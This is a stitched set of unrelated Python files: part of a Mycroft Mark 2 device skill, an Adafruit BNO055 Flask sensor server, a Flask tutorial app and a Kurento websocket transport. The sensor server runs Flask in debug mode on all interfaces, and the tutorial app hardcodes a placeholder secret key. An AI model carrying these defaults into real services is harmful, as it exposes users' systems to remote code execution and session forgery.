# Use Legacy for QuickSetting delegate
self.gui.register_handler('mycroft.device.settings',
self.handle_device_settings)
self.gui.register_handler('mycroft.device.settings.homescreen',
self.handle_device_homescreen_settings)
self.gui.register_handler('mycroft.device.settings.ssh',
self.handle_device_ssh_settings)
self.gui.register_handler('mycroft.device.settings.reset',
self.handle_device_factory_reset_settings)
self.gui.register_handler('mycroft.device.settings.update',
self.handle_device_update_settings)
self.gui.register_handler('mycroft.device.settings.restart',
self.handle_device_restart_action)
self.gui.register_handler('mycroft.device.settings.poweroff',
self.handle_device_poweroff_action)
self.gui.register_handler('mycroft.device.settings.wireless',
self.handle_show_wifi_screen_intent)
self.gui.register_handler('mycroft.device.show.idle',
self.show_idle_screen)
# Handle idle selection
self.gui.register_handler('mycroft.device.set.idle',
self.set_idle_screen)
# System events
self.add_event('system.reboot', self.handle_system_reboot)
self.add_event('system.shutdown', self.handle_system_shutdown)
# Handle volume setting via I2C
self.add_event('mycroft.volume.set', self.on_volume_set)
self.add_event('mycroft.volume.get', self.on_volume_get)
# Show loading screen while starting up skills.
# self.gui['state'] = 'loading'
# self.gui.show_page('all.qml')
# Collect Idle screens and display if skill is restarted
self.collect_resting_screens()
except Exception:
LOG.exception('In Mark 2 Skill')
# Update use of wake-up beep
self._sync_wake_beep_setting()
self.settings_change_callback = self.on_websettings_changed
def start_listening_thread(self):
# Start listening thread
if not self.thread:
self.running = True
self.thread = Thread(target=self.listen_thread)
self.thread.daemon = True
self.thread.start()
def stop_listening_thread(self):
if self.thread:
self.running = False
self.thread.join()
self.thread = None
###################################################################
# System events
def handle_system_reboot(self, message):
self.speak_dialog('rebooting', wait=True)
subprocess.call(['/usr/bin/systemctl', 'reboot'])
def handle_system_shutdown(self, message):
subprocess.call(['/usr/bin/systemctl', 'poweroff'])
###################################################################
# System volume
def on_volume_set(self, message):
""" Force vol between 0.0 and 1.0. """
vol = message.data.get("percent", 0.5)
vol = clip(vol, 0.0, 1.0)
self.volume = vol
self.muted = False
self.set_hardware_volume(vol)
self.show_volume = True
def on_volume_get(self, message):
""" Handle request for current volume. """
self.bus.emit(message.response(data={'percent': self.volume,
'muted': self.muted}))
def set_hardware_volume(self, pct):
""" Set the volume on hardware (which supports levels 0-63).
Arguments:
pct (float): audio volume (0.0 - 1.0).
"""
vol = int(VOL_SMAX * pct + VOL_OFFSET) if pct >= 0.01 else VOL_ZERO
self.log.debug('Setting hardware volume to: {}'.format(pct))
command = ['i2cset',
'-y', # force a write
str(self.i2c_channel), # i2c bus number
'0x4b', # stereo amp device addr
str(vol)] # volume level, 0-63
self.log.info(' '.join(command))
try:
subprocess.call(command)
except Exception as e:
self.log.error('Couldn\'t set volume. ({})'.format(e))
def get_hardware_volume(self):
# Get the volume from hardware
command = ['i2cget', '-y', str(self.i2c_channel), '0x4b']
self.log.info(' '.join(command))
try:
vol = subprocess.check_output(command)
# Convert the returned hex value from i2cget
hw_vol = int(vol, 16)
hw_vol = clip(hw_vol, 0, 63)
self.volume = clip((hw_vol - VOL_OFFSET) / VOL_SMAX, 0.0, 1.0)
except subprocess.CalledProcessError as e:
self.log.info('I2C Communication error: {}'.format(repr(e)))
except FileNotFoundError:
self.log.info('i2cget couldn\'t be found')
except Exception:
self.log.info('UNEXPECTED VOLUME RESULT: {}'.format(vol))
###################################################################
# Idle screen mechanism
def save_resting_screen(self):
""" Handler to be called if the settings are changed by
the GUI.
Stores the selected idle screen.
"""
self.log.debug("Saving resting screen")
self.settings['selected'] = self.gui['selected']
self.gui['selectedScreen'] = self.gui['selected']
def collect_resting_screens(self):
""" Trigger collection and then show the resting screen. """
self.bus.emit(Message('mycroft.mark2.collect_idle'))
time.sleep(1)
self.show_idle_screen()
def on_register_idle(self, message):
""" Handler for catching incoming idle screens. """
if 'name' in message.data and 'id' in message.data:
self.idle_screens[message.data['name']] = message.data['id']
self.log.info('Registered {}'.format(message.data['name']))
else:
self.log.error('Malformed idle screen registration received')
def reset_face(self, message):
""" Triggered after skills are initialized.
Switches from the resting "face" to a registered resting screen.
"""
time.sleep(1)
self.collect_resting_screens()
def listen_thread(self):
""" listen on mic input until self.running is False. """
self.setup_mic_listening()
self.log.debug("Starting listening")
while self.running:
self.listen()
self.stream.close()
self.log.debug("Listening stopped")
def get_audio_level(self):
""" Get level directly from audio device. """
try:
block = self.stream.read(INPUT_FRAMES_PER_BLOCK)
except IOError as e:
# Mic read failed; count the error and skip this block
self.errorcount += 1
self.log.error('{} Error recording: {}'.format(self.errorcount, e))
return None
amplitude = get_rms(block)
result = int(amplitude / ((self.max_amplitude) + 0.001) * 15)
self.max_amplitude = max(amplitude, self.max_amplitude)
return result
def get_listener_level(self):
""" Get level from IPC file created by listener. """
time.sleep(0.05)
if not self.listener_file:
try:
self.listener_file = os.path.join(get_ipc_directory(),
'mic_level')
except FileNotFoundError:
return None
try:
st_results = os.stat(self.listener_file)
if (not st_results.st_ctime == self.st_results.st_ctime or
not st_results.st_mtime == self.st_results.st_mtime):
ret = read_file_from(self.listener_file, 0)
self.st_results = st_results
if ret is not None:
if ret > self.max_amplitude:
self.max_amplitude = ret
ret = int(ret / self.max_amplitude * 10)
return ret
except Exception as e:
self.log.error(repr(e))
return None
def listen(self):
""" Read microphone level and store rms into self.gui['volume']. """
amplitude = self.get_audio_level()
# amplitude = self.get_listener_level()
if (self.gui and
('volume' not in self.gui or self.gui['volume'] != amplitude) and
amplitude is not None):
self.gui['volume'] = amplitude
def restore_idle_screen(self, _=None):
if (self.override_idle and
time.monotonic() - self.override_idle[1] > 2):
self.override_idle = None
self.show_idle_screen()
def stop(self, message=None):
""" Clear override_idle and stop visemes. """
self.restore_idle_screen()
self.gui['viseme'] = {'start': 0, 'visemes': []}
return False
def shutdown(self):
# Gotta clean up manually since not using add_event()
self.bus.remove('mycroft.skill.handler.start',
self.on_handler_started)
self.bus.remove('recognizer_loop:sleep',
self.on_handler_sleep)
self.bus.remove('mycroft.awoken',
self.on_handler_awoken)
self.bus.remove('enclosure.mouth.reset',
self.on_handler_mouth_reset)
self.bus.remove('recognizer_loop:audio_output_end',
self.on_handler_mouth_reset)
self.bus.remove('enclosure.mouth.viseme_list',
self.on_handler_speaking)
self.bus.remove('gui.page.show',
self.on_gui_page_show)
self.bus.remove('gui.page_interaction', self.on_gui_page_interaction)
self.bus.remove('mycroft.mark2.register_idle', self.on_register_idle)
self.stop_listening_thread()
#####################################################################
# Manage "busy" visual
def on_handler_started(self, message):
handler = message.data.get("handler", "")
# Ignoring handlers from this skill and from the background clock
if 'Mark2' in handler:
return
if 'TimeSkill.update_display' in handler:
return
def on_gui_page_interaction(self, message):
""" Reset idle timer to 30 seconds when page is flipped. """
self.log.info("Resetting idle counter to 30 seconds")
self.start_idle_event(30)
def on_gui_page_show(self, message):
if 'mark-2' not in message.data.get('__from', ''):
# Some skill other than the handler is showing a page
self.has_show_page = True
# If a skill overrides the idle do not switch page
override_idle = message.data.get('__idle')
if override_idle is True:
# Disable idle screen
self.log.info('Cancelling Idle screen')
self.cancel_idle_event()
self.override_idle = (message, time.monotonic())
elif isinstance(override_idle, int) and override_idle is not False:
# Set the indicated idle timeout
self.log.info('Overriding idle timer to'
' {} seconds'.format(override_idle))
self.start_idle_event(override_idle)
elif (message.data['page'] and
not message.data['page'][0].endswith('idle.qml')):
# Check if the show_page deactivates a previous idle override
# This is only possible if the page is from the same skill
if (override_idle is False and self.override_idle and
compare_origin(message, self.override_idle[0])):
# Remove the idle override page if override is set to false
self.override_idle = None
# Set default idle screen timer
self.start_idle_event(30)
def on_handler_mouth_reset(self, message):
""" Restore viseme to a smile. """
pass
def on_handler_sleep(self, message):
""" Show resting face when going to sleep. """
self.gui['state'] = 'resting'
self.gui.show_page('all.qml')
def on_handler_awoken(self, message):
""" Show awake face when sleep ends. """
self.gui['state'] = 'awake'
self.gui.show_page('all.qml')
def on_handler_complete(self, message):
""" When a skill finishes executing clear the showing page state. """
handler = message.data.get('handler', '')
# Ignoring handlers from this skill and from the background clock
if 'Mark2' in handler:
return
if 'TimeSkill.update_display' in handler:
return
self.has_show_page = False
try:
if self.hourglass_info[handler] == -1:
self.enclosure.reset()
del self.hourglass_info[handler]
except Exception:
# There is a slim chance the self.hourglass_info might not
# be populated if this skill reloads at just the right time
# so that it misses the mycroft.skill.handler.start but
# catches the mycroft.skill.handler.complete
pass
#####################################################################
# Manage "speaking" visual
def on_handler_speaking(self, message):
""" Show the speaking page if no skill has registered a page
to be shown in its place.
"""
self.gui["viseme"] = message.data
if not self.has_show_page:
self.gui['state'] = 'speaking'
self.gui.show_page("all.qml")
# Show the idle screen after the visemes are done (+ 5 sec).
viseme_time = message.data['visemes'][-1][1] + 5
self.start_idle_event(viseme_time)
#####################################################################
# Manage "idle" visual state
def cancel_idle_event(self):
self.idle_next = 0
self.cancel_scheduled_event('IdleCheck')
def start_idle_event(self, offset=60, weak=False):
""" Start an event for showing the idle screen.
Arguments:
offset: How long until the idle screen should be shown
weak: set to true if the time should be able to be overridden
"""
with self.idle_lock:
if time.monotonic() + offset < self.idle_next:
self.log.info('No update, before next time')
return
self.log.info('Starting idle event')
try:
if not weak:
self.idle_next = time.monotonic() + offset
# Clear any existing checker
self.cancel_scheduled_event('IdleCheck')
time.sleep(0.5)
self.schedule_event(self.show_idle_screen, int(offset),
name='IdleCheck')
self.log.info('Showing idle screen in '
'{} seconds'.format(offset))
except Exception as e:
self.log.exception(repr(e))
def show_idle_screen(self):
""" Show the idle screen or return to the skill that's overriding idle.
"""
self.log.debug('Showing idle screen')
screen = None
if self.override_idle:
self.log.debug('Returning to override idle screen')
# Restore the page overriding idle instead of the normal idle
self.bus.emit(self.override_idle[0])
elif len(self.idle_screens) > 0 and 'selected' in self.gui:
# TODO remove hard coded value
self.log.debug('Showing Idle screen for '
'{}'.format(self.gui['selected']))
screen = self.idle_screens.get(self.gui['selected'])
if screen:
self.bus.emit(Message('{}.idle'.format(screen)))
def handle_listener_started(self, message):
""" Shows listener page after wakeword is triggered.
Starts countdown to show the idle page.
"""
# Start idle timer
self.cancel_idle_event()
self.start_idle_event(weak=True)
# Lower the max by half at the start of listening to make sure
# loud noises don't make the level stick too much
if self.max_amplitude > 0.001:
self.max_amplitude /= 2
self.start_listening_thread()
# Show listening page
self.gui['state'] = 'listening'
self.gui.show_page('all.qml')
def handle_listener_ended(self, message):
""" When listening has ended show the thinking animation. """
self.has_show_page = False
self.gui['state'] = 'thinking'
self.gui.show_page('all.qml')
self.stop_listening_thread()
def handle_failed_stt(self, message):
""" No discernable words were transcribed. Show idle screen again. """
self.show_idle_screen()
#####################################################################
# Manage network connection feedback
def handle_internet_connected(self, message):
""" System came online later after booting. """
self.enclosure.mouth_reset()
#####################################################################
# Web settings
def on_websettings_changed(self):
""" Update use of wake-up beep. """
self._sync_wake_beep_setting()
def _sync_wake_beep_setting(self):
""" Update "use beep" global config from skill settings. """
from mycroft.configuration.config import (
LocalConf, USER_CONFIG, Configuration
)
config = Configuration.get()
use_beep = self.settings.get('use_listening_beep') is True
if not config['confirm_listening'] == use_beep:
# Update local (user) configuration setting
new_config = {
'confirm_listening': use_beep
}
user_config = LocalConf(USER_CONFIG)
user_config.merge(new_config)
user_config.store()
self.bus.emit(Message('configuration.updated'))
#####################################################################
# Brightness intent interaction
def percent_to_level(self, percent):
""" Converts the brigtness value from percentage to a
value the Arduino can read
Arguments:
percent (int): interger value from 0 to 100
return:
(int): value form 0 to 30
"""
return int(float(percent) / float(100) * 30)
def parse_brightness(self, brightness):
""" Parse text for brightness percentage.
Arguments:
brightness (str): string containing brightness level
Returns:
(int): brightness as percentage (0-100)
"""
try:
# Handle "full", etc.
name = normalize(brightness)
if name in self.brightness_dict:
return self.brightness_dict[name]
if '%' in brightness:
brightness = brightness.replace("%", "").strip()
return int(brightness)
if 'percent' in brightness:
brightness = brightness.replace("percent", "").strip()
return int(brightness)
i = int(brightness)
if i < 0 or i > 100:
return None
if i < 30:
# Assmume plain 0-30 is "level"
return int((i * 100.0) / 30.0)
# Assume plain 31-100 is "percentage"
return i
except Exception:
return None # failed in an int() conversion
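# Worked examples for the two helpers above (illustrative values; names such as
# 'full' depend on the brightness.levels vocabulary for the current locale):
#   parse_brightness('50 percent') -> 50
#   parse_brightness('15')         -> 50   (plain values 0-30 are treated as levels)
#   percent_to_level(50)           -> 15   (percentage mapped back to the 0-30 range)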
def set_screen_brightness(self, level, speak=True):
""" Actually change screen brightness.
Arguments:
level (int): 0-30, brightness level
speak (bool): when True, speak a confirmation
"""
# TODO CHANGE THE BRIGHTNESS
if speak is True:
percent = int(float(level) * float(100) / float(30))
self.speak_dialog(
'brightness.set', data={'val': str(percent) + '%'})
def _set_brightness(self, brightness):
# brightness can be a number or word like "full", "half"
percent = self.parse_brightness(brightness)
if percent is None:
self.speak_dialog('brightness.not.found.final')
elif int(percent) == -1:
self.handle_auto_brightness(None)
else:
self.auto_brightness = False
self.set_screen_brightness(self.percent_to_level(percent))
@intent_file_handler('brightness.intent')
def handle_brightness(self, message):
""" Intent handler to set custom screen brightness.
Arguments:
message (dict): messagebus message from intent parser
"""
brightness = (message.data.get('brightness', None) or
self.get_response('brightness.not.found'))
if brightness:
self._set_brightness(brightness)
def _get_auto_time(self):
""" Get dawn, sunrise, noon, sunset, and dusk time.
Returns:
times (dict): dict with associated (datetime, level)
"""
tz = self.location['timezone']['code']
lat = self.location['coordinate']['latitude']
lon = self.location['coordinate']['longitude']
ast_loc = astral.Location()
ast_loc.timezone = tz
ast_loc.latitude = lat
ast_loc.longitude = lon
user_set_tz = \
timezone(tz).localize(datetime.now()).strftime('%Z')
device_tz = time.tzname
if user_set_tz in device_tz:
sunrise = ast_loc.sun()['sunrise']
noon = ast_loc.sun()['noon']
sunset = ast_loc.sun()['sunset']
else:
secs = int(self.location['timezone']['offset']) / -1000
sunrise = arrow.get(
ast_loc.sun()['sunrise']).shift(
seconds=secs).replace(tzinfo='UTC').datetime
noon = arrow.get(
ast_loc.sun()['noon']).shift(
seconds=secs).replace(tzinfo='UTC').datetime
sunset = arrow.get(
ast_loc.sun()['sunset']).shift(
seconds=secs).replace(tzinfo='UTC').datetime
return {
'Sunrise': (sunrise, 20), # high
'Noon': (noon, 30), # full
'Sunset': (sunset, 5) # dim
}
def schedule_brightness(self, time_of_day, pair):
""" Schedule auto brightness with the event scheduler.
Arguments:
time_of_day (str): Sunrise, Noon, Sunset
pair (tuple): (datetime, brightness)
"""
d_time = pair[0]
brightness = pair[1]
now = arrow.now()
arw_d_time = arrow.get(d_time)
data = (time_of_day, brightness)
if now.timestamp > arw_d_time.timestamp:
d_time = arrow.get(d_time).shift(hours=+24)
self.schedule_event(self._handle_screen_brightness_event, d_time,
data=data, name=time_of_day)
else:
self.schedule_event(self._handle_screen_brightness_event, d_time,
data=data, name=time_of_day)
@intent_file_handler('brightness.auto.intent')
def handle_auto_brightness(self, message):
""" brightness varies depending on time of day
Arguments:
message (Message): messagebus message from intent parser
"""
self.auto_brightness = True
auto_time = self._get_auto_time()
nearest_time_to_now = (float('inf'), None, None)
for time_of_day, pair in auto_time.items():
self.schedule_brightness(time_of_day, pair)
now = arrow.now().timestamp
t = arrow.get(pair[0]).timestamp
if abs(now - t) < nearest_time_to_now[0]:
nearest_time_to_now = (abs(now - t), pair[1], time_of_day)
self.set_screen_brightness(nearest_time_to_now[1], speak=False)
def _handle_screen_brightness_event(self, message):
""" Wrapper for setting screen brightness from eventscheduler
Arguments:
message (Message): messagebus message
"""
if self.auto_brightness is True:
time_of_day = message.data[0]
level = message.data[1]
self.cancel_scheduled_event(time_of_day)
self.set_screen_brightness(level, speak=False)
pair = self._get_auto_time()[time_of_day]
self.schedule_brightness(time_of_day, pair)
#####################################################################
# Device Settings
@intent_file_handler('device.settings.intent')
def handle_device_settings(self, message):
""" Display device settings page. """
self.gui['state'] = 'settings/settingspage'
self.gui.show_page('all.qml')
@intent_file_handler('device.wifi.settings.intent')
def handle_show_wifi_screen_intent(self, message):
""" display network selection page. """
self.gui.clear()
self.gui['state'] = 'settings/networking/SelectNetwork'
self.gui.show_page('all.qml')
@intent_file_handler('device.homescreen.settings.intent')
def handle_device_homescreen_settings(self, message):
"""
display homescreen settings page
"""
screens = [{'screenName': s, 'screenID': self.idle_screens[s]}
for s in self.idle_screens]
self.gui['idleScreenList'] = {'screenBlob': screens}
self.gui['selectedScreen'] = self.gui['selected']
self.gui['state'] = 'settings/homescreen_settings'
self.gui.show_page('all.qml')
@intent_file_handler('device.ssh.settings.intent')
def handle_device_ssh_settings(self, message):
""" Display ssh settings page. """
self.gui['state'] = 'settings/ssh_settings'
self.gui.show_page('all.qml')
@intent_file_handler('device.reset.settings.intent')
def handle_device_factory_reset_settings(self, message):
""" Display device factory reset settings page. """
self.gui['state'] = 'settings/factoryreset_settings'
self.gui.show_page('all.qml')
def set_idle_screen(self, message):
""" Set selected idle screen from message. """
self.gui['selected'] = message.data['selected']
self.save_resting_screen()
def handle_device_update_settings(self, message):
""" Display device update settings page. """
self.gui['state'] = 'settings/updatedevice_settings'
self.gui.show_page('all.qml')
def handle_device_restart_action(self, message):
""" Device restart action. """
self.log.info('PlaceholderRestartAction')
def handle_device_poweroff_action(self, message):
""" Device poweroff action. """
self.log.info('PlaceholderShutdownAction')
def create_skill():
return Mark2()
|
server.py
|
# Adafruit BNO055 WebGL Example
#
# Requires the flask web framework to be installed. See http://flask.pocoo.org/
# for installation instructions, however on a Linux machine like the Raspberry
# Pi or BeagleBone black you can likely install it by running:
# sudo apt-get update
# sudo apt-get install python3-flask
#
# Copyright (c) 2015 Adafruit Industries
# Author: Tony DiCola
# 2019 update: Carter Nelson
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import json
import logging
import threading
import time
from flask import Flask, Response, render_template
import board
import busio
import adafruit_bno055
i2c = busio.I2C(board.SCL, board.SDA)
# Create the BNO sensor connection.
bno = adafruit_bno055.BNO055(i2c)
# Application configuration below. You probably don't need to change these values.
# How often to update the BNO sensor data (in hertz).
BNO_UPDATE_FREQUENCY_HZ = 10
# Name of the file to store calibration data when the save/load calibration
# button is pressed. Calibration data is stored in JSON format.
CALIBRATION_FILE = 'calibration.json'
# BNO sensor axes remap values. These are the parameters to the BNO.set_axis_remap
# function. Don't change these without consulting section 3.4 of the datasheet.
# The default axes mapping below assumes the Adafruit BNO055 breakout is flat on
# a table with the row of SDA, SCL, GND, VIN, etc pins facing away from you.
#BNO_AXIS_REMAP = { 'x': BNO055.AXIS_REMAP_X,
# 'y': BNO055.AXIS_REMAP_Z,
# 'z': BNO055.AXIS_REMAP_Y,
# 'x_sign': BNO055.AXIS_REMAP_POSITIVE,
# 'y_sign': BNO055.AXIS_REMAP_POSITIVE,
# 'z_sign': BNO055.AXIS_REMAP_NEGATIVE }
# Create flask application.
app = Flask(__name__)
# Global state to keep track of the latest readings from the BNO055 sensor.
# This will be accessed from multiple threads so care needs to be taken to
# protect access with a lock (or else inconsistent/partial results might be read).
# A condition object is used both as a lock for safe access across threads, and
# to notify threads that the BNO state has changed.
bno_data = {}
bno_changed = threading.Condition()
# Background thread to read BNO sensor data. Will be created right before
# the first request is served (see start_bno_thread below).
bno_thread = None
def read_bno():
"""Function to read the BNO sensor and update the bno_data object with the
latest BNO orientation, etc. state. Must be run in its own thread because
it will never return!
"""
while True:
# Capture the lock on the bno_changed condition so the bno_data shared
# state can be updated.
with bno_changed:
bno_data['euler'] = bno.euler
bno_data['temp'] = bno.temperature
bno_data['quaternion'] = bno.quaternion
bno_data['calibration'] = bno.calibration_status
# Notify any waiting threads that the BNO state has been updated.
bno_changed.notify_all()
# Sleep until the next reading.
time.sleep(1.0/BNO_UPDATE_FREQUENCY_HZ)
def bno_sse():
"""Function to handle sending BNO055 sensor data to the client web browser
using HTML5 server sent events (aka server push). This is a generator function
that flask will run in a thread and call to get new data that is pushed to
the client web page.
"""
# Loop forever waiting for a new BNO055 sensor reading and sending it to
# the client. Since this is a generator function the yield statement is
# used to return a new result.
while True:
# Capture the bno_changed condition lock and then wait for it to notify
# a new reading is available.
with bno_changed:
bno_changed.wait()
# A new reading is available! Grab the reading value and then give
# up the lock.
heading, roll, pitch = bno_data['euler']
temp = bno_data['temp']
x, y, z, w = bno_data['quaternion']
sys, gyro, accel, mag = bno_data['calibration']
# Send the data to the connected client in HTML5 server sent event format.
data = {'heading': heading, 'roll': roll, 'pitch': pitch, 'temp': temp,
'quatX': x, 'quatY': y, 'quatZ': z, 'quatW': w,
'calSys': sys, 'calGyro': gyro, 'calAccel': accel, 'calMag': mag }
yield 'data: {0}\n\n'.format(json.dumps(data))
@app.before_first_request
def start_bno_thread():
# Start the BNO thread right before the first request is served. This is
# necessary because in debug mode flask will start multiple main threads so
# this is the only spot to put code that can only run once after starting.
# See this SO question for more context:
# http://stackoverflow.com/questions/24617795/starting-thread-while-running-flask-with-debug
global bno_thread
# Kick off BNO055 reading thread.
bno_thread = threading.Thread(target=read_bno)
bno_thread.daemon = True # Don't let the BNO reading thread block exiting.
bno_thread.start()
@app.route('/bno')
def bno_path():
# Return SSE response and call bno_sse function to stream sensor data to
# the webpage.
return Response(bno_sse(), mimetype='text/event-stream')
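# For reference, a minimal client-side consumer of this stream (a sketch, not
# part of this server; it assumes the `requests` package is installed and the
# server is running on localhost:5000):
#
#   import json, requests
#   with requests.get('http://localhost:5000/bno', stream=True) as resp:
#       for line in resp.iter_lines(decode_unicode=True):
#           if line.startswith('data: '):
#               reading = json.loads(line[len('data: '):])
#               print(reading['heading'], reading['roll'], reading['pitch'])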
@app.route('/save_calibration', methods=['POST'])
def save_calibration():
# Save calibration data to disk.
#
# TODO: implement this
#
return 'OK'
@app.route('/load_calibration', methods=['POST'])
def load_calibration():
# Load calibration from disk.
#
# TODO: implement this
#
return 'OK'
@app.route('/')
def root():
return render_template('index.html')
if __name__ == '__main__':
# Create a server listening for external connections on the default
# port 5000. Enable debug mode for better error messages and live
# reloading of the server on changes. Also make the server threaded
# so multiple connections can be processed at once (very important
# for using server sent events).
app.run(host='0.0.0.0', debug=True, threaded=True)
|
hello.py
|
from flask import Flask, render_template, session, redirect, url_for, flash
from flask_bootstrap import Bootstrap
from flask_sqlalchemy import SQLAlchemy
from flask_migrate import Migrate, MigrateCommand
from flask_script import Manager, Shell
from flask_moment import Moment
from flask_mail import Mail, Message
from flask_wtf import Form
from wtforms import StringField, SubmitField
from wtforms.validators import DataRequired
from datetime import datetime
from threading import Thread
import os
app = Flask(__name__)
basedir = os.path.abspath(os.path.dirname(__file__))
app.config['SECRET_KEY'] = 'hard to guess string'
app.config['SQLALCHEMY_DATABASE_URI'] =\
'sqlite:///' + os.path.join(basedir, 'data.sqlite')
app.config['SQLALCHEMY_COMMIT_ON_TEARDOWN'] = True
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = True
app.config['MAIL_SERVER'] = 'smtp.qq.com'
app.config['MAIL_PORT'] = 465
app.config['MAIL_USE_SSL'] = True
app.config['MAIL_USE_TLS'] = False
app.config['MAIL_USERNAME'] = os.environ.get('MAIL_USERNAME')
app.config['MAIL_PASSWORD'] = os.environ.get('MAIL_PASSWORD')
app.config['FLASKY_MAIL_SUBJECT_PREFIX'] = '[FLASKY]'
app.config['FLASKY_MAIL_SENDER'] = 'Flasky Admin <a35486882@qq.com>'
app.config['FLASKY_ADMIN'] = os.environ.get('FLASKY_ADMIN')
manager = Manager(app)
bootstrap = Bootstrap(app)
moment = Moment(app)
db = SQLAlchemy(app)
migrate = Migrate(app, db)
manager.add_command('db', MigrateCommand)
mail = Mail(app)
class Role(db.Model):
__tablename__ = 'roles'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(64), unique=True)
users = db.relationship('User', backref='role', lazy='dynamic')
def __repr__(self):
return '<Role %r>' % self.name
class User(db.Model):
__tablename__ = 'users'
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(64), unique=True, index=True)
role_id = db.Column(db.Integer, db.ForeignKey('roles.id'))
def __repr__(self):
return '<User {}>'.format(self.username)
@app.route('/', methods=['GET', 'POST'])
def index():
form = NameForm()
if form.validate_on_submit():
user = User.query.filter_by(username=form.name.data).first()
if user is None:
user = User(username=form.name.data)
db.session.add(user)
session['known'] = False
if app.config['FLASKY_ADMIN']:
send_email(app.config['FLASKY_ADMIN'], 'New User', 'mail/new_user',
user=user)
else:
session['known'] = True
session['name'] = form.name.data
flash('Looks like you have changed your name!')
form.name.data = ''
return redirect(url_for('index'))
return render_template('index.html', current_time=datetime.utcnow(), form=form,
name=session.get('name'), known=session.get('known'))
@app.route('/user/<name>')
def user(name):
return render_template('user.html', name=name)
@app.errorhandler(404)
def page_not_found(e):
return render_template('404.html'), 404
@app.errorhandler(500)
def internal_server_error(e):
return render_template('500.html'), 500
class NameForm(Form):
name = StringField("What's your name?", validators=[DataRequired()])
submit = SubmitField('Submit')
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_email(to, subject, template, **kwargs):
msg = Message(app.config['FLASKY_MAIL_SUBJECT_PREFIX'] + subject,
sender=app.config['FLASKY_MAIL_SENDER'], recipients=[to])
msg.body = render_template(template + '.txt', **kwargs)
msg.html = render_template(template + '.html', **kwargs)
# mail.send(msg)
# print(to, subject, template, **kwargs)
thr = Thread(target=send_async_email, args=[app, msg])
thr.start()
return thr
def make_shell_context():
return dict(app=app, db=db, User=User, Role=Role)
manager.add_command('shell', Shell(make_context=make_shell_context))
if __name__ == '__main__':
manager.run()
|
transport.py
|
import websocket
import json
import time
import threading
import logging
logger = logging.getLogger(__name__)
class TimeoutException(Exception):
pass
class Timeout(object):
def __init__(self, seconds=1, error_message='Timeout'):
self.seconds = seconds
self.error_message = error_message
self.timer = None
def handle_timeout(self):
raise TimeoutException(self.error_message)
def __enter__(self):
# Note: the timer is created but never started, so this context manager does
# not enforce a timeout by itself; interrupting a blocking recv() would also
# require a websocket-level timeout (ws.settimeout).
self.timer = threading.Timer(self.seconds, self.handle_timeout)
return self
def __exit__(self, type, value, traceback):
if self.timer:
self.timer.cancel()
class KurentoTransportException(Exception):
def __init__(self, message, response=None):
super(KurentoTransportException, self).__init__(message)
self.message = message
self.response = response if response is not None else {}
def __str__(self):
return "%s - %s" % (str(self.message), json.dumps(self.response))
class KurentoTransport(object):
def __init__(self, url):
logger.debug("Creating new KurentoTransport with url: %s" % url)
self.url = url
self.ws = websocket.WebSocket()
self.current_id = 0
self.session_id = None
self.pending_operations = {}
self.subscriptions = {}
self.on_event = {}
self.stopped = False
self.thread = threading.Thread(target=self._run_thread)
self.thread.daemon = True
self.thread.start()
def __del__(self):
logger.debug("Destroying KurentoTransport with url: %s" % self.url)
self.stopped = True
self.ws.close()
def _check_connection(self):
if not self.ws.connected:
logger.info("Kurent Client websocket is not connected, reconnecting")
try:
with Timeout(seconds=5):
self.ws.connect(self.url)
logger.info("Kurent Client websocket connected!")
except TimeoutException:
# modifying this exception so we can differentiate in the receiver thread
raise KurentoTransportException("Timeout: Kurento Client websocket connection timed out")
def _run_thread(self):
while not self.stopped:
try:
self._check_connection()
with Timeout(seconds=1):
self._on_message(self.ws.recv())
except TimeoutException:
logger.debug("WS Receiver Timeout")
except Exception as ex:
logger.error("WS Receiver Thread %s: %s" % (type(ex), str(ex)))
def _next_id(self):
self.current_id += 1
return self.current_id
def _on_message(self, message):
resp = json.loads(message)
logger.debug("received message: %s" % message)
if 'method' in resp:
if (resp['method'] == 'onEvent' and 'params' in resp and 'value' in resp['params']):
if ('subscription' in resp['params'] and resp['params']['subscription'] in self.subscriptions):
sub_id = resp['params']['subscription']
fn = self.subscriptions[sub_id]
self.session_id = resp['params']['sessionId'] if 'sessionId' in resp['params'] else self.session_id
fn(resp["params"]["value"])
elif 'object' in resp['params']['value'] and resp['params']['value']['object'] in self.on_event:
obj = self.on_event[resp['params']['value']['object']]
if 'type' in resp['params']['value'] and resp['params']['value']['type'] in obj:
fn = obj[resp['params']['value']['type']]
fn(resp["params"]["value"])
else:
if 'result' in resp and 'sessionId' in resp['result']:
self.session_id = resp['result']['sessionId']
self.pending_operations["%d_response" % resp["id"]] = resp
def _rpc(self, rpc_type, **args):
if self.session_id:
args["sessionId"] = self.session_id
request = {
"jsonrpc": "2.0",
"id": self._next_id(),
"method": rpc_type,
"params": args
}
req_key = "%d_request" % request["id"]
resp_key = "%d_response" % request["id"]
self.pending_operations[req_key] = request
self._check_connection()
logger.debug("sending message: %s" % json.dumps(request))
self.ws.send(json.dumps(request))
while (resp_key not in self.pending_operations):
time.sleep(0.01)
resp = self.pending_operations[resp_key]
del self.pending_operations[req_key]
del self.pending_operations[resp_key]
if 'error' in resp:
raise KurentoTransportException(resp['error']['message'] if 'message' in resp['error'] else 'Unknown Error', resp)
elif 'result' in resp and 'value' in resp['result']:
return resp['result']['value']
else:
return None # just to be explicit
